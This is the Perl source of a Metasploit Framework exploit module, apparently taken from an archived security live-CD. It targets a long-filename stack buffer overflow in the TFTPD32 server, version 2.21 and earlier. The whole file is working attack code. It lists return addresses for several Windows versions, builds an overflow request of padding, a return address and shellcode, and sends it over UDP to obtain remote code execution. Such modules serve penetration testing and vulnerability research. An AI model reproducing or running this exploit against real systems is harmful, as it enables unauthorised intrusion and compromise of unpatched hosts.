home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / exploits / tftpd32_long_filename.pm < prev    next >
Text File  |  2006-06-30  |  3KB  |  105 lines

  1.  
  2. ##
  3. # This file is part of the Metasploit Framework and may be redistributed
  4. # according to the licenses defined in the Authors field below. In the
  5. # case of an unknown or missing license, this file defaults to the same
  6. # license as the core Framework (dual GPLv2 and Artistic). The latest
  7. # version of the Framework can always be obtained from metasploit.com.
  8. ##
  9.  
  10. package Msf::Exploit::tftpd32_long_filename;
  11. use base "Msf::Exploit";
  12. use strict;
  13. use Pex::Text;
  14.  
  15. my $advanced = { };
  16.  
  17. my $info =
  18.   {
  19.  
  20.     'Name'     => 'TFTPD32 <= 2.21 Long Filename Buffer Overflow',
  21.     'Version'  => '$Revision: 3715 $',
  22.     'Authors'  => [ 'y0 [at] w00t-shell.net', ],
  23.     'Arch'     => [ 'x86' ],
  24.     'OS'       => [ 'win32', 'winnt', 'win2000', 'winxp' ],
  25.     'Priv'     => 0,
  26.     'UserOpts'  =>
  27.       {
  28.         'RHOST' => [1, 'ADDR', 'The target address'],
  29.         'RPORT' => [1, 'PORT', 'The target port', 69],
  30.         'SSL'   => [0, 'BOOL', 'Use SSL'],
  31.       },
  32.     'AutoOpts' => { 'EXITFUNC' => 'process' },
  33.     'Payload' =>
  34.       {
  35.         'Space'     => 250,
  36.         'BadChars'  => "\x00",
  37.         'Prepend'   => "\x81\xc4\xff\xef\xff\xff\x44",
  38.         'Keys'      => ['+ws2ord'],
  39.       },
  40.  
  41.     'Description'  => Pex::Text::Freeform(qq{
  42.     This module exploits a stack overflow in TFTPD32 version 2.21
  43. and prior. By sending a request for an overly long file name
  44. to the tftpd32 server, a remote attacker could overflow a buffer and
  45. execute arbitrary code on the system.
  46. }),
  47.  
  48.     'Refs'  =>  [
  49.         ['BID', '6199'],
  50.       ],
  51.  
  52.     'Targets' =>
  53.       [
  54.         ['Windows NT 4.0 SP6a English',  0x77f9d463],
  55.         ['Windows 2000 PRO SP4 English', 0x7c2ec663],
  56.         ['Windows XP SP0 Pro English',   0x77dc0df0],
  57.         ['Windows XP SP1 Pro English',   0x77dc5527],
  58.         ['Windows 2003 SP0 English',     0x77d69def],
  59.         ['Windows 2003 SP1 English',     0x773b24da],        
  60.       ],
  61.     'Keys' => ['tftp'],
  62.   };
  63.  
  64. sub new {
  65.     my $class = shift;
  66.     my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
  67.     return($self);
  68. }
  69.  
  70. sub Exploit
  71. {
  72.     my $self = shift;
  73.     my $target_host = $self->GetVar('RHOST');
  74.     my $target_port = $self->GetVar('RPORT');
  75.     my $target_idx  = $self->GetVar('TARGET');
  76.     my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
  77.     my $target = $self->Targets->[$target_idx];
  78.  
  79.     my $sploit =
  80.       "\x00\x01". Pex::Text::AlphaNumText(120). ".".
  81.       Pex::Text::AlphaNumText(135). pack('V', $target->[1]).
  82.       $shellcode. "\x00";
  83.  
  84.     $self->PrintLine(sprintf("[*] Trying to exploit target %s 0x%.8x", $target->[0], $target->[1]));
  85.  
  86.     my $s = Msf::Socket::Udp->new
  87.       (
  88.         'PeerAddr'  => $target_host,
  89.         'PeerPort'  => $target_port,
  90.         'LocalPort' => $self->GetVar('CPORT'),
  91.         'SSL'       => $self->GetVar('SSL'),
  92.       );
  93.     if ($s->IsError) {
  94.         $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
  95.         return;
  96.     }
  97.  
  98.     $s->Send($sploit);
  99.     $self->Handler($s);
  100.     $s->Close();
  101.     return;
  102. }
  103.  
  104. 1;
  105.